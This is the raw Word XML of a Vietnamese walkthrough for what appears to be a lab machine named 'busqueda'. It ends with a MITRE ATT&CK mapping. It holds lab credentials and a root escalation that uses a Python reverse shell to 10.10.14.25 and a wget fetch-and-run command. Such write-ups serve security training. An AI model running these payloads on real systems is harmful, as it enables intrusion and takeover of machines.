      </w:r>
    </w:p>
    <w:p w14:paraId="3869F579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env_reset, mail_badpass,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FAF826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secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0EB7CC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use_pty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADFFD2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</w:p>
    <w:p w14:paraId="2F3C1F04" w14:textId="77777777" w:rsidR="00944977" w:rsidRPr="00147C0B" w:rsidRDefault="00944977" w:rsidP="00944977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User svc may run the following commands on busqueda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44BF3B" w14:textId="557E9918" w:rsidR="00944977" w:rsidRPr="00147C0B" w:rsidRDefault="00944977" w:rsidP="000573C7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="216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(root) /usr/bin/python3 /opt/scripts/system-checkup.py *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18370DC4" w14:textId="5CC57B77" w:rsidR="000573C7" w:rsidRPr="00147C0B" w:rsidRDefault="000573C7" w:rsidP="000573C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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Password của svc là jh1usoih2bkjaspwe92.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1265CB4A" w14:textId="13E0DE31" w:rsidR="00B809E1" w:rsidRPr="00147C0B" w:rsidRDefault="00B809E1" w:rsidP="00B809E1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ssh với password vừa thu được để nâng cấp shell. (thành công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8CBE1" w14:textId="2FD5DCA4" w:rsidR="0007453A" w:rsidRPr="00147C0B" w:rsidRDefault="0007453A" w:rsidP="0007453A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc152350957"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>SUID</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="20B4CB06" w14:textId="3072348E" w:rsidR="009E35E3" w:rsidRPr="00147C0B" w:rsidRDefault="00066D50" w:rsidP="00011093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File system-checkup.py và đ</w:t>
      </w:r>
      <w:r w:rsidR="000573C7"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ường dẫn /opt/scripts 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đều </w:t>
      </w:r>
      <w:r w:rsidR="000573C7"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không có quyền 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>ghi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CFDD1B" w14:textId="3007E961" w:rsidR="0007453A" w:rsidRPr="00147C0B" w:rsidRDefault="0007453A" w:rsidP="00011093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Chạy thử:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBEC682" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>svc@busqueda:~$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py hehe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D272B8" w14:textId="77777777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Usage: /opt/scripts/system-checkup.py &lt;action&gt; (arg1) (arg2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887E2AC" w14:textId="77777777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</w:p>
    <w:p w14:paraId="000FB48F" w14:textId="77777777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docker-ps     : List running docker containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E7DC8" w14:textId="77777777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docker-inspect : Inpect a certain docker container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A90F678" w14:textId="7C71D7E6" w:rsidR="0007453A" w:rsidRPr="00147C0B" w:rsidRDefault="0007453A" w:rsidP="0007453A">
      <w:pPr>
        <w:ind w:left="720"/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     full-checkup  : Run a full system checkup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474335CB" w14:textId="04F10E9F" w:rsidR="00192345" w:rsidRPr="00147C0B" w:rsidRDefault="00192345" w:rsidP="00624EB0">
      <w:pPr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docker-ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36748F76" w14:textId="0C0AF704" w:rsidR="00624EB0" w:rsidRPr="00147C0B" w:rsidRDefault="00624EB0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79547B90" wp14:editId="646D3E44">
            <wp:extent cx="5760720" cy="763270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51E1" w14:textId="7B606754" w:rsidR="00624EB0" w:rsidRPr="00147C0B" w:rsidRDefault="00624EB0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Ta thấy được máy đang chạy 2 container: gitea, </w:t>
      </w:r>
      <w:r w:rsidR="00D92435" w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mysql_db</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BDAA8" w14:textId="03C63A08" w:rsidR="00C652A7" w:rsidRPr="00147C0B" w:rsidRDefault="00192345" w:rsidP="00624EB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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docker-inspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0625BD4A" w14:textId="49112624" w:rsidR="00192345" w:rsidRPr="00147C0B" w:rsidRDefault="00C652A7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Cách chạy inspect trên docker: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00664DEE" w:rsidRPr="00147C0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>https://docs.docker.com/config/formatting/?source=post_page-----964fed1515a6--------------------------------</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31F10294" w14:textId="419A45D4" w:rsidR="00664DEE" w:rsidRPr="00147C0B" w:rsidRDefault="00664DEE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Inspect gitea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9475B9" w14:textId="55733D40" w:rsidR="003B352E" w:rsidRPr="00147C0B" w:rsidRDefault="00C652A7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46A78EE9" wp14:editId="341CADD9">
            <wp:extent cx="5760720" cy="1825625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="6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0A6" w14:textId="4AE8339F" w:rsidR="00664DEE" w:rsidRPr="00147C0B" w:rsidRDefault="00664DEE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Dùng công cụ codebeautiful online để dễ nhìn hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52294357" w14:textId="17695A50" w:rsidR="00664DEE" w:rsidRPr="00147C0B" w:rsidRDefault="00664DEE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cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="553F8532" wp14:editId="04C31268">
            <wp:extent cx="5760720" cy="324040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69A8" w14:textId="51A39E2A" w:rsidR="00D92435" w:rsidRPr="00147C0B" w:rsidRDefault="00D92435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Không thu được thông tin gì đặc biệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E244E1" w14:textId="0E569DA6" w:rsidR="00192345" w:rsidRPr="00147C0B" w:rsidRDefault="00D92435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>Tiếp tục với mysql_db:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD445AD" w14:textId="3C4D326E" w:rsidR="00D92435" w:rsidRPr="00147C0B" w:rsidRDefault="00D92435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384742F7" wp14:editId="395CE86B">
            <wp:extent cx="3665220" cy="1929169"/>
            <wp:effectExtent l="0" t="0" r="0" b="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1108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C77" w14:textId="2BFF1EFF" w:rsidR="00D92435" w:rsidRPr="00147C0B" w:rsidRDefault="00D92435" w:rsidP="00624EB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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Ta thu được creadentials: </w:t>
      </w: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gitea:</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>yuiu1hoiu4i5ho1uh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554E05E" w14:textId="7E7E40E2" w:rsidR="00DC5CD7" w:rsidRPr="00147C0B" w:rsidRDefault="00DC5CD7" w:rsidP="00624EB0">
      <w:pPr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  <w:t>Full-checkup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F952A" w14:textId="5F072097" w:rsidR="00DC5CD7" w:rsidRPr="00147C0B" w:rsidRDefault="00DC5CD7" w:rsidP="00624EB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128847FE" wp14:editId="113EA9A7">
            <wp:extent cx="5311600" cy="30482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232A" w14:textId="49555D46" w:rsidR="00E20AB8" w:rsidRPr="00147C0B" w:rsidRDefault="00E20AB8" w:rsidP="00E20AB8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc152350958"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Credential stuffing 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="7EA453BD" w14:textId="3239B3DB" w:rsidR="00E20AB8" w:rsidRPr="00147C0B" w:rsidRDefault="00E20AB8" w:rsidP="00E20AB8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Đăng nhập page gitea.searcher.htb với account </w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>administrator:</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>yuiu1hoiu4i5ho1uh</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>(thành công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D7E5D" w14:textId="5A898D0E" w:rsidR="00E20AB8" w:rsidRPr="00147C0B" w:rsidRDefault="00E20AB8" w:rsidP="00E20AB8">
      <w:pPr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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B189EEB" wp14:editId="40FE6D69">
            <wp:extent cx="5760720" cy="324040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37B0" w14:textId="3FB6244B" w:rsidR="008D4AF8" w:rsidRPr="00147C0B" w:rsidRDefault="008D4AF8" w:rsidP="00147C0B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc152350959"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="78740C40" w14:textId="312FF250" w:rsidR="00E860D5" w:rsidRPr="00147C0B" w:rsidRDefault="00E860D5" w:rsidP="00E20AB8">
      <w:pPr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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15B77B77" wp14:editId="0D897554">
            <wp:extent cx="5760720" cy="962660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="12" name="Picture 12" descr="A black rectangular object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rectangular object with a white stri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85D" w14:textId="41D08886" w:rsidR="00E860D5" w:rsidRPr="00147C0B" w:rsidRDefault="00E860D5" w:rsidP="00E20AB8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Thu thập được source code các file trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7812674D" w14:textId="32B5795C" w:rsidR="00E860D5" w:rsidRPr="00147C0B" w:rsidRDefault="00E860D5" w:rsidP="00E20AB8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Check file system-checkup.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD7DCF" w14:textId="6A36CF2E" w:rsidR="00E860D5" w:rsidRPr="00147C0B" w:rsidRDefault="00E860D5" w:rsidP="00E20AB8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noProof/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5689EEA6" wp14:editId="04952EF3">
            <wp:extent cx="2857748" cy="1386960"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="13" name="Picture 1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6B2C" w14:textId="4E5CFCB4" w:rsidR="008D4AF8" w:rsidRPr="00147C0B" w:rsidRDefault="00E860D5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 xml:space="preserve">Tôi thấy được rằng khi gọi với tham số full-checkup thì sẽ chạy file full-checkup.sh tại thư mục hiện </w:t>
      </w:r>
      <w:r w:rsidR="00EF22A1" w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60575E7B" w14:textId="5428D689" w:rsidR="008D4AF8" w:rsidRPr="00147C0B" w:rsidRDefault="008D4AF8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 xml:space="preserve">Vậy ý tưởng của tôi </w:t>
      </w:r>
      <w:r w:rsidR="009E4898" w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">để leo quyền </w:t>
      </w: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là tạo một file-checkup.sh theo ý mình tại folder có thể ghi (/tmp) rồi chạy suid system-checkup.py</w:t>
      </w:r>
      <w:r w:rsidR="009E4898" w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực thi lệnh theo ý mình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667E3A8" w14:textId="64192BBA" w:rsidR="003A6411" w:rsidRPr="00147C0B" w:rsidRDefault="009E4898" w:rsidP="00624EB0">
      <w:pPr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b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE0E3D" w14:textId="6DA4532A" w:rsidR="003A6411" w:rsidRPr="00147C0B" w:rsidRDefault="003A6411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Tạo file file-checkup.sh tại máy với nội dung sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5FEAA7" w14:textId="77777777" w:rsidR="003A6411" w:rsidRPr="00147C0B" w:rsidRDefault="003A6411" w:rsidP="003A6411">
      <w:pPr>
        <w:ind w:left="720"/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#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54175E9A" w14:textId="4CBA00C7" w:rsidR="003A6411" w:rsidRPr="00147C0B" w:rsidRDefault="003A6411" w:rsidP="003A6411">
      <w:pPr>
        <w:ind w:left="720"/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import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>10.10.14.25",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E7E34" w14:textId="31785BB9" w:rsidR="00FB091D" w:rsidRPr="00147C0B" w:rsidRDefault="00FB091D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Mở server để victim có thể lấy file về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7CC6A" w14:textId="065643B5" w:rsidR="008D4AF8" w:rsidRPr="00147C0B" w:rsidRDefault="00FB091D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noProof/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36701B3F" wp14:editId="05D204F9">
            <wp:extent cx="5098222" cy="754445"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="16" name="Picture 1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E604" w14:textId="431F34CB" w:rsidR="008D4AF8" w:rsidRPr="00147C0B" w:rsidRDefault="008D4AF8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Chạy lệnh sau tại /tmp/</w:t>
      </w:r>
      <w:r w:rsidR="00FB091D" w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> để tải file về máy victim và chạy</w:t>
      </w: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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEF170" w14:textId="59B2A155" w:rsidR="008D4AF8" w:rsidRPr="00147C0B" w:rsidRDefault="008D4AF8" w:rsidP="003A6411">
      <w:pPr>
        <w:ind w:left="720"/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color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>wget http://10.10.14.25:1234/full-checkup.sh;chmod +x full-checkup.sh; sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E41D29" w14:textId="00E86F63" w:rsidR="00FB091D" w:rsidRPr="00147C0B" w:rsidRDefault="00FB091D" w:rsidP="00624EB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42CF85AB" wp14:editId="04027A55">
            <wp:extent cx="3702050" cy="1214958"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="15" name="Picture 1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3098" cy="12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C67" w14:textId="6B135F4C" w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc152350960"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Summary - Mapping MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="613BCEFC" w14:textId="1570A674" w:rsidR="00147C0B" w:rsidRPr="005A5EA7" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc152350961"/>
      <w:r w:rsidRPr="005A5EA7">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tactics: Reconnaissan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C0B" w:rsidRPr="00147C0B" w14:paraId="411178B4" w14:textId="77777777" w:rsidTr="00147C0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF1A638" w14:textId="5D276056" w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidRDefault="00147C0B" w:rsidP="00147C0B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3A82A56F" w14:textId="587DE265" w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidRDefault="00147C0B" w:rsidP="00147C0B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147C0B" w:rsidRPr="00147C0B" w14:paraId="26536CA6" w14:textId="77777777" w:rsidTr="00147C0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56506203" w14:textId="33CEB768" w:rsidR="00147C0B" w:rsidRPr="00BD400A" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Active Scanning</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> [</w:t>
            </w:r>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidRPr="00BD400A">
                <w:rPr>
                  <w:rStyle w:val="link-annotation-unknown-block-id--720375198"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="22"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>T1595</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64CCF803" w14:textId="3B929C3A" w:rsidR="00147C0B" w:rsidRPr="00BD400A" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Kẻ tấn công đã thực hiện trinh sát target để thu thập các thông tin sơ lược như IP, các port được mở và các service tương ứng. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="498B038D" w14:textId="4228183B" w:rsidR="00BA42FD" w:rsidRPr="005A5EA7" w:rsidRDefault="00BA42FD" w:rsidP="00BA42FD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc152350962"/>
      <w:r w:rsidRPr="005A5EA7">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactics: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA42FD">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Discove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2FD" w:rsidRPr="00147C0B" w14:paraId="3A4A4230" w14:textId="77777777" w:rsidTr="003266BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75141714" w14:textId="77777777" w:rsidR="00BA42FD" w:rsidRPr="00147C0B" w:rsidRDefault="00BA42FD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1EC658D2" w14:textId="77777777" w:rsidR="00BA42FD" w:rsidRPr="00147C0B" w:rsidRDefault="00BA42FD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BA42FD" w:rsidRPr="0063447B" w14:paraId="4B2440C0" w14:textId="77777777" w:rsidTr="003266BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD9F35E" w14:textId="28CDA1E5" w:rsidR="00BA42FD" w:rsidRPr="00B93EEF" w:rsidRDefault="00BD400A" w:rsidP="003266BE">
            <w:pPr>
